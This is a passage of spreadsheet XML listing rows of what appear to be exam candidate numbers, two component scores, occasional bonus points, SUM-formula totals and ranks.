    <row r="391" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A391" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B391" s="8" t="n">
        <v>1314011611</v>
      </c>
      <c r="C391" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D391" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E391" s="8" t="n">
        <v>68.6</v>
      </c>
      <c r="F391" s="8" t="n">
        <v>68.6</v>
      </c>
      <c r="G391" s="8"/>
      <c r="H391" s="8" t="n">
        <f aca="false">SUM(E391:G391)</f>
        <v>137.2</v>
      </c>
      <c r="I391" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="392" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A392" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B392" s="8" t="n">
        <v>1314011503</v>
      </c>
      <c r="C392" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D392" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E392" s="8" t="n">
        <v>62</v>
      </c>
      <c r="F392" s="8" t="n">
        <v>74.8</v>
      </c>
      <c r="G392" s="8"/>
      <c r="H392" s="8" t="n">
        <f aca="false">SUM(E392:G392)</f>
        <v>136.8</v>
      </c>
      <c r="I392" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="393" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A393" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B393" s="8" t="n">
        <v>1314011412</v>
      </c>
      <c r="C393" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D393" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E393" s="8" t="n">
        <v>61.4</v>
      </c>
      <c r="F393" s="8" t="n">
        <v>74.2</v>
      </c>
      <c r="G393" s="8"/>
      <c r="H393" s="8" t="n">
        <f aca="false">SUM(E393:G393)</f>
        <v>135.6</v>
      </c>
      <c r="I393" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="394" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A394" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B394" s="8" t="n">
        <v>1314011413</v>
      </c>
      <c r="C394" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D394" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E394" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="F394" s="8" t="n">
        <v>70.8</v>
      </c>
      <c r="G394" s="8"/>
      <c r="H394" s="8" t="n">
        <f aca="false">SUM(E394:G394)</f>
        <v>134.4</v>
      </c>
      <c r="I394" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="395" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A395" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B395" s="8" t="n">
        <v>1314011601</v>
      </c>
      <c r="C395" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D395" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E395" s="8" t="n">
        <v>63.8</v>
      </c>
      <c r="F395" s="8" t="n">
        <v>70.6</v>
      </c>
      <c r="G395" s="8"/>
      <c r="H395" s="8" t="n">
        <f aca="false">SUM(E395:G395)</f>
        <v>134.4</v>
      </c>
      <c r="I395" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="396" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A396" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B396" s="8" t="n">
        <v>1314011605</v>
      </c>
      <c r="C396" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D396" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E396" s="8" t="n">
        <v>64.2</v>
      </c>
      <c r="F396" s="8" t="n">
        <v>70</v>
      </c>
      <c r="G396" s="8"/>
      <c r="H396" s="8" t="n">
        <f aca="false">SUM(E396:G396)</f>
        <v>134.2</v>
      </c>
      <c r="I396" s="8" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="397" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A397" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B397" s="8" t="n">
        <v>1314011522</v>
      </c>
      <c r="C397" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D397" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E397" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="F397" s="8" t="n">
        <v>70.2</v>
      </c>
      <c r="G397" s="8"/>
      <c r="H397" s="8" t="n">
        <f aca="false">SUM(E397:G397)</f>
        <v>131.8</v>
      </c>
      <c r="I397" s="8" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="398" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A398" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B398" s="8" t="n">
        <v>1314011405</v>
      </c>
      <c r="C398" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D398" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E398" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="F398" s="8" t="n">
        <v>71.2</v>
      </c>
      <c r="G398" s="8"/>
      <c r="H398" s="8" t="n">
        <f aca="false">SUM(E398:G398)</f>
        <v>131.6</v>
      </c>
      <c r="I398" s="8" t="n">
        <v>14</v>
      </c>
    </row>
    <row r="399" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A399" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B399" s="8" t="n">
        <v>1314011409</v>
      </c>
      <c r="C399" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D399" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E399" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="F399" s="8" t="n">
        <v>69.2</v>
      </c>
      <c r="G399" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H399" s="8" t="n">
        <f aca="false">SUM(E399:G399)</f>
        <v>130.8</v>
      </c>
      <c r="I399" s="8" t="n">
        <v>15</v>
      </c>
    </row>
    <row r="400" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A400" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B400" s="8" t="n">
        <v>1314011410</v>
      </c>
      <c r="C400" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D400" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E400" s="8" t="n">
        <v>59</v>
      </c>
      <c r="F400" s="8" t="n">
        <v>66</v>
      </c>
      <c r="G400" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H400" s="8" t="n">
        <f aca="false">SUM(E400:G400)</f>
        <v>130</v>
      </c>
      <c r="I400" s="8" t="n">
        <v>16</v>
      </c>
    </row>
    <row r="401" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A401" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B401" s="8" t="n">
        <v>1314011504</v>
      </c>
      <c r="C401" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D401" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E401" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="F401" s="8" t="n">
        <v>64.8</v>
      </c>
      <c r="G401" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H401" s="8" t="n">
        <f aca="false">SUM(E401:G401)</f>
        <v>130</v>
      </c>
      <c r="I401" s="8" t="n">
        <v>16</v>
      </c>
    </row>
    <row r="402" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A402" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B402" s="8" t="n">
        <v>1314011603</v>
      </c>
      <c r="C402" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D402" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E402" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="F402" s="8" t="n">
        <v>67.4</v>
      </c>
      <c r="G402" s="8"/>
      <c r="H402" s="8" t="n">
        <f aca="false">SUM(E402:G402)</f>
        <v>130</v>
      </c>
      <c r="I402" s="8" t="n">
        <v>16</v>
      </c>
    </row>
    <row r="403" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A403" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B403" s="8" t="n">
        <v>1314011406</v>
      </c>
      <c r="C403" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D403" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E403" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="F403" s="8" t="n">
        <v>70.6</v>
      </c>
      <c r="G403" s="8"/>
      <c r="H403" s="8" t="n">
        <f aca="false">SUM(E403:G403)</f>
        <v>128.8</v>
      </c>
      <c r="I403" s="8" t="n">
        <v>19</v>
      </c>
    </row>
    <row r="404" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A404" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B404" s="8" t="n">
        <v>1314011521</v>
      </c>
      <c r="C404" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D404" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E404" s="8" t="n">
        <v>59</v>
      </c>
      <c r="F404" s="8" t="n">
        <v>69.6</v>
      </c>
      <c r="G404" s="8"/>
      <c r="H404" s="8" t="n">
        <f aca="false">SUM(E404:G404)</f>
        <v>128.6</v>
      </c>
      <c r="I404" s="8" t="n">
        <v>20</v>
      </c>
    </row>
    <row r="405" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A405" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B405" s="8" t="n">
        <v>1314011626</v>
      </c>
      <c r="C405" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D405" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E405" s="8" t="n">
        <v>60.2</v>
      </c>
      <c r="F405" s="8" t="n">
        <v>68</v>
      </c>
      <c r="G405" s="8"/>
      <c r="H405" s="8" t="n">
        <f aca="false">SUM(E405:G405)</f>
        <v>128.2</v>
      </c>
      <c r="I405" s="8" t="n">
        <v>21</v>
      </c>
    </row>
    <row r="406" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A406" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B406" s="8" t="n">
        <v>1314011414</v>
      </c>
      <c r="C406" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D406" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E406" s="8" t="n">
        <v>61</v>
      </c>
      <c r="F406" s="8" t="n">
        <v>67</v>
      </c>
      <c r="G406" s="8"/>
      <c r="H406" s="8" t="n">
        <f aca="false">SUM(E406:G406)</f>
        <v>128</v>
      </c>
      <c r="I406" s="8" t="n">
        <v>22</v>
      </c>
    </row>
    <row r="407" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A407" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B407" s="8" t="n">
        <v>1314011518</v>
      </c>
      <c r="C407" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D407" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E407" s="8" t="n">
        <v>57.2</v>
      </c>
      <c r="F407" s="8" t="n">
        <v>70.2</v>
      </c>
      <c r="G407" s="8"/>
      <c r="H407" s="8" t="n">
        <f aca="false">SUM(E407:G407)</f>
        <v>127.4</v>
      </c>
      <c r="I407" s="8" t="n">
        <v>23</v>
      </c>
    </row>
    <row r="408" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A408" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B408" s="8" t="n">
        <v>1314011517</v>
      </c>
      <c r="C408" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D408" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E408" s="8" t="n">
        <v>59.2</v>
      </c>
      <c r="F408" s="8" t="n">
        <v>67.4</v>
      </c>
      <c r="G408" s="8"/>
      <c r="H408" s="8" t="n">
        <f aca="false">SUM(E408:G408)</f>
        <v>126.6</v>
      </c>
      <c r="I408" s="8" t="n">
        <v>24</v>
      </c>
    </row>
    <row r="409" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A409" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B409" s="8" t="n">
        <v>1314011625</v>
      </c>
      <c r="C409" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D409" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E409" s="8" t="n">
        <v>61.4</v>
      </c>
      <c r="F409" s="8" t="n">
        <v>65.2</v>
      </c>
      <c r="G409" s="8"/>
      <c r="H409" s="8" t="n">
        <f aca="false">SUM(E409:G409)</f>
        <v>126.6</v>
      </c>
      <c r="I409" s="8" t="n">
        <v>24</v>
      </c>
    </row>
    <row r="410" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A410" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B410" s="8" t="n">
        <v>1314011624</v>
      </c>
      <c r="C410" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D410" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E410" s="8" t="n">
        <v>60.2</v>
      </c>
      <c r="F410" s="8" t="n">
        <v>65.8</v>
      </c>
      <c r="G410" s="8"/>
      <c r="H410" s="8" t="n">
        <f aca="false">SUM(E410:G410)</f>
        <v>126</v>
      </c>
      <c r="I410" s="8" t="n">
        <v>26</v>
      </c>
    </row>
    <row r="411" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A411" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B411" s="8" t="n">
        <v>1314011403</v>
      </c>
      <c r="C411" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D411" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E411" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="F411" s="8" t="n">
        <v>65</v>
      </c>
      <c r="G411" s="8"/>
      <c r="H411" s="8" t="n">
        <f aca="false">SUM(E411:G411)</f>
        <v>125.4</v>
      </c>
      <c r="I411" s="8" t="n">
        <v>27</v>
      </c>
    </row>
    <row r="412" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A412" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B412" s="8" t="n">
        <v>1314011526</v>
      </c>
      <c r="C412" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D412" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E412" s="8" t="n">
        <v>57.4</v>
      </c>
      <c r="F412" s="8" t="n">
        <v>67.2</v>
      </c>
      <c r="G412" s="8"/>
      <c r="H412" s="8" t="n">
        <f aca="false">SUM(E412:G412)</f>
        <v>124.6</v>
      </c>
      <c r="I412" s="8" t="n">
        <v>28</v>
      </c>
    </row>
    <row r="413" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A413" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B413" s="8" t="n">
        <v>1314011424</v>
      </c>
      <c r="C413" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D413" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E413" s="8" t="n">
        <v>54.4</v>
      </c>
      <c r="F413" s="8" t="n">
        <v>69.2</v>
      </c>
      <c r="G413" s="8"/>
      <c r="H413" s="8" t="n">
        <f aca="false">SUM(E413:G413)</f>
        <v>123.6</v>
      </c>
      <c r="I413" s="8" t="n">
        <v>29</v>
      </c>
    </row>
    <row r="414" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A414" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B414" s="8" t="n">
        <v>1314011513</v>
      </c>
      <c r="C414" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D414" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E414" s="8" t="n">
        <v>54</v>
      </c>
      <c r="F414" s="8" t="n">
        <v>68.6</v>
      </c>
      <c r="G414" s="8"/>
      <c r="H414" s="8" t="n">
        <f aca="false">SUM(E414:G414)</f>
        <v>122.6</v>
      </c>
      <c r="I414" s="8" t="n">
        <v>30</v>
      </c>
    </row>
    <row r="415" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A415" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B415" s="8" t="n">
        <v>1314011506</v>
      </c>
      <c r="C415" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D415" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E415" s="8" t="n">
        <v>57.6</v>
      </c>
      <c r="F415" s="8" t="n">
        <v>64.8</v>
      </c>
      <c r="G415" s="8"/>
      <c r="H415" s="8" t="n">
        <f aca="false">SUM(E415:G415)</f>
        <v>122.4</v>
      </c>
      <c r="I415" s="8" t="n">
        <v>31</v>
      </c>
    </row>
    <row r="416" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A416" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B416" s="8" t="n">
        <v>1314011415</v>
      </c>
      <c r="C416" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D416" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E416" s="8" t="n">
        <v>55.6</v>
      </c>
      <c r="F416" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="G416" s="8"/>
      <c r="H416" s="8" t="n">
        <f aca="false">SUM(E416:G416)</f>
        <v>122.2</v>
      </c>
      <c r="I416" s="8" t="n">
        <v>32</v>
      </c>
    </row>
    <row r="417" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A417" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B417" s="8" t="n">
        <v>1314011511</v>
      </c>
      <c r="C417" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D417" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E417" s="8" t="n">
        <v>56.8</v>
      </c>
      <c r="F417" s="8" t="n">
        <v>65.2</v>
      </c>
      <c r="G417" s="8"/>
      <c r="H417" s="8" t="n">
        <f aca="false">SUM(E417:G417)</f>
        <v>122</v>
      </c>
      <c r="I417" s="8" t="n">
        <v>33</v>
      </c>
    </row>
    <row r="418" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A418" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B418" s="8" t="n">
        <v>1314011512</v>
      </c>
      <c r="C418" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D418" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E418" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F418" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="G418" s="8"/>
      <c r="H418" s="8" t="n">
        <f aca="false">SUM(E418:G418)</f>
        <v>122</v>
      </c>
      <c r="I418" s="8" t="n">
        <v>33</v>
      </c>
    </row>
    <row r="419" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A419" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B419" s="8" t="n">
        <v>1314011612</v>
      </c>
      <c r="C419" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D419" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E419" s="8" t="n">
        <v>55</v>
      </c>
      <c r="F419" s="8" t="n">
        <v>66.8</v>
      </c>
      <c r="G419" s="8"/>
      <c r="H419" s="8" t="n">
        <f aca="false">SUM(E419:G419)</f>
        <v>121.8</v>
      </c>
      <c r="I419" s="8" t="n">
        <v>35</v>
      </c>
    </row>
    <row r="420" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A420" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B420" s="8" t="n">
        <v>1314011404</v>
      </c>
      <c r="C420" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D420" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E420" s="8" t="n">
        <v>56.8</v>
      </c>
      <c r="F420" s="8" t="n">
        <v>64.8</v>
      </c>
      <c r="G420" s="8"/>
      <c r="H420" s="8" t="n">
        <f aca="false">SUM(E420:G420)</f>
        <v>121.6</v>
      </c>
      <c r="I420" s="8" t="n">
        <v>36</v>
      </c>
    </row>
    <row r="421" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A421" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B421" s="8" t="n">
        <v>1314011607</v>
      </c>
      <c r="C421" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D421" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E421" s="8" t="n">
        <v>53.4</v>
      </c>
      <c r="F421" s="8" t="n">
        <v>68</v>
      </c>
      <c r="G421" s="8"/>
      <c r="H421" s="8" t="n">
        <f aca="false">SUM(E421:G421)</f>
        <v>121.4</v>
      </c>
      <c r="I421" s="8" t="n">
        <v>37</v>
      </c>
    </row>
    <row r="422" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A422" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B422" s="8" t="n">
        <v>1314011411</v>
      </c>
      <c r="C422" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D422" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E422" s="8" t="n">
        <v>55.2</v>
      </c>
      <c r="F422" s="8" t="n">
        <v>65.2</v>
      </c>
      <c r="G422" s="8"/>
      <c r="H422" s="8" t="n">
        <f aca="false">SUM(E422:G422)</f>
        <v>120.4</v>
      </c>
      <c r="I422" s="8" t="n">
        <v>38</v>
      </c>
    </row>
    <row r="423" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A423" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B423" s="8" t="n">
        <v>1314011619</v>
      </c>
      <c r="C423" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D423" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E423" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="F423" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="G423" s="8"/>
      <c r="H423" s="8" t="n">
        <f aca="false">SUM(E423:G423)</f>
        <v>120.4</v>
      </c>
      <c r="I423" s="8" t="n">
        <v>38</v>
      </c>
    </row>
    <row r="424" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A424" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B424" s="8" t="n">
        <v>1314011516</v>
      </c>
      <c r="C424" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D424" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E424" s="8" t="n">
        <v>53.8</v>
      </c>
      <c r="F424" s="8" t="n">
        <v>65.2</v>
      </c>
      <c r="G424" s="8"/>
      <c r="H424" s="8" t="n">
        <f aca="false">SUM(E424:G424)</f>
        <v>119</v>
      </c>
      <c r="I424" s="8" t="n">
        <v>40</v>
      </c>
    </row>
    <row r="425" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A425" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B425" s="8" t="n">
        <v>1314011618</v>
      </c>
      <c r="C425" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D425" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E425" s="8" t="n">
        <v>52.6</v>
      </c>
      <c r="F425" s="8" t="n">
        <v>66</v>
      </c>
      <c r="G425" s="8"/>
      <c r="H425" s="8" t="n">
        <f aca="false">SUM(E425:G425)</f>
        <v>118.6</v>
      </c>
      <c r="I425" s="8" t="n">
        <v>41</v>
      </c>
    </row>
    <row r="426" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A426" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B426" s="8" t="n">
        <v>1314011422</v>
      </c>
      <c r="C426" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D426" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E426" s="8" t="n">
        <v>50.6</v>
      </c>
      <c r="F426" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="G426" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H426" s="8" t="n">
        <f aca="false">SUM(E426:G426)</f>
        <v>118.2</v>
      </c>
      <c r="I426" s="8" t="n">
        <v>42</v>
      </c>
    </row>
    <row r="427" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A427" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B427" s="8" t="n">
        <v>1314011627</v>
      </c>
      <c r="C427" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D427" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E427" s="8" t="n">
        <v>56.8</v>
      </c>
      <c r="F427" s="8" t="n">
        <v>61.4</v>
      </c>
      <c r="G427" s="8"/>
      <c r="H427" s="8" t="n">
        <f aca="false">SUM(E427:G427)</f>
        <v>118.2</v>
      </c>
      <c r="I427" s="8" t="n">
        <v>42</v>
      </c>
    </row>
    <row r="428" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A428" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B428" s="8" t="n">
        <v>1314011608</v>
      </c>
      <c r="C428" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D428" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E428" s="8" t="n">
        <v>53.4</v>
      </c>
      <c r="F428" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="G428" s="8"/>
      <c r="H428" s="8" t="n">
        <f aca="false">SUM(E428:G428)</f>
        <v>117</v>
      </c>
      <c r="I428" s="8" t="n">
        <v>44</v>
      </c>
    </row>
    <row r="429" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A429" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B429" s="8" t="n">
        <v>1314011529</v>
      </c>
      <c r="C429" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D429" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E429" s="8" t="n">
        <v>54.2</v>
      </c>
      <c r="F429" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="G429" s="8"/>
      <c r="H429" s="8" t="n">
        <f aca="false">SUM(E429:G429)</f>
        <v>116.6</v>
      </c>
      <c r="I429" s="8" t="n">
        <v>45</v>
      </c>
    </row>
    <row r="430" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A430" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B430" s="8" t="n">
        <v>1314011420</v>
      </c>
      <c r="C430" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D430" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E430" s="8" t="n">
        <v>53</v>
      </c>
      <c r="F430" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="G430" s="8"/>
      <c r="H430" s="8" t="n">
        <f aca="false">SUM(E430:G430)</f>
        <v>115.2</v>
      </c>
      <c r="I430" s="8" t="n">
        <v>46</v>
      </c>
    </row>
    <row r="431" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A431" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B431" s="8" t="n">
        <v>1314011425</v>
      </c>
      <c r="C431" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D431" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E431" s="8" t="n">
        <v>52.8</v>
      </c>
      <c r="F431" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="G431" s="8"/>
      <c r="H431" s="8" t="n">
        <f aca="false">SUM(E431:G431)</f>
        <v>115</v>
      </c>
      <c r="I431" s="8" t="n">
        <v>47</v>
      </c>
    </row>
    <row r="432" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A432" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B432" s="8" t="n">
        <v>1314011505</v>
      </c>
      <c r="C432" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D432" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E432" s="8" t="n">
        <v>55</v>
      </c>
      <c r="F432" s="8" t="n">
        <v>59</v>
      </c>
      <c r="G432" s="8"/>
      <c r="H432" s="8" t="n">
        <f aca="false">SUM(E432:G432)</f>
        <v>114</v>
      </c>
      <c r="I432" s="8" t="n">
        <v>48</v>
      </c>
    </row>
    <row r="433" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A433" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B433" s="8" t="n">
        <v>1314011620</v>
      </c>
      <c r="C433" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D433" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E433" s="8" t="n">
